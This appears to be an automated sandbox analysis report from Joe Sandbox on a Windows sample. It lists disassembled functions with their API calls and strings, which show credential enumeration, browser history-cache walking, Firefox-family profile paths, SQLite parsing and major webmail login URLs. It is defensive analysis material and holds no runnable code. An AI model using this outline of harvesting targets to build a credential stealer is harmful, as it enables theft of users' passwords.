Control-flow Graph (rendered as an image; the node/edge list and its executed/not-executed legend are not reproduced). Basic blocks 40e175-40e2a8 call memset, free and _snwprintf, plus internal routines 40695d, 406b90, 4069a3, 406e8f, 406b53, 40dd50, 40aa04, 40742e, 40aae3 and 40a8d0.
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph (rendered as an image; not reproduced in text)
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (rendered as an image; the node/edge list and its executed/not-executed legend are not reproduced). Basic blocks 41837f-41851d select between CreateFileW and CreateFileA, then call GetLastError, free and memset, plus internal routines 418197, 418160, 41739b, 418758 and 444706; on the GetLastError path one branch calls 41837f again, i.e. the routine re-enters itself on failure.
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$ErrorLastfree
                                                              • String ID: |A
                                                              • API String ID: 77810686-1717621600
                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph (rendered as an image; not reproduced in text)
                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Control-flow Graph (rendered as an image; not reproduced in text)
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 3527940856-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 3527940856-2068335096
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 3527940856-3369679110
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 3249829328-1174173950
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
